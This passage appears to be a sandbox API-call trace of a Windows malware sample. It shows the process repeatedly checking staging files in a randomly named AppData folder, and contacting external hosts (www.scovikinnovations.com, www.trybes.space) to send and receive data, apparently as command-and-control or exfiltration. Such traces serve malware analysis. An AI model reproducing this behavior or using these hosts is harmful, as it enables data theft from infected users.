FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.292] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0163.292] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929450) returned 1 [0163.292] socket (af=2, type=1, protocol=6) returned 0x2540 [0163.292] getaddrinfo (in: pNodeName="www.scovikinnovations.com", pServiceName="80", pHints=0x87910b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87910e8 | out: ppResult=0x87910e8*=0x862c200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), ai_next=0x0)) returned 0 [0163.421] connect (s=0x2540, name=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), namelen=16) returned 0 [0163.558] send (s=0x2540, buf=0xa10808a*, len=169, flags=0) returned 169 [0163.558] setsockopt (s=0x2540, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0163.558] recv (in: s=0x2540, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 749 [0163.713] closesocket (s=0x2540) returned 0 [0163.714] Sleep (dwMilliseconds=0x7d0) [0163.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.715] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.715] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0163.715] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929ba0) returned 1 [0163.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.715] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.715] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.715] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89299f0) returned 1 [0163.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.715] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928eb0) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.716] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929450) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.716] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.716] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.716] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89290f0) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.716] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.716] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.716] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89299f0) returned 1 [0163.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.717] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0163.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.717] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a380) returned 1 [0163.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.717] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0163.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89298d0) returned 1 [0163.717] socket (af=2, type=1, protocol=6) returned 0x2540 [0163.717] getaddrinfo (in: pNodeName="www.trybes.space", pServiceName="80", pHints=0x8791458*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791488 | out: ppResult=0x8791488*=0x0) returned 11002 [0163.937] Sleep (dwMilliseconds=0x7d0) [0163.938] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.938] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0163.939] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a380) returned 1 [0163.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.939] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.939] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89298d0) returned 1 [0163.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.939] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.939] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.939] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.939] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.939] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.939] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929960) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.940] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: 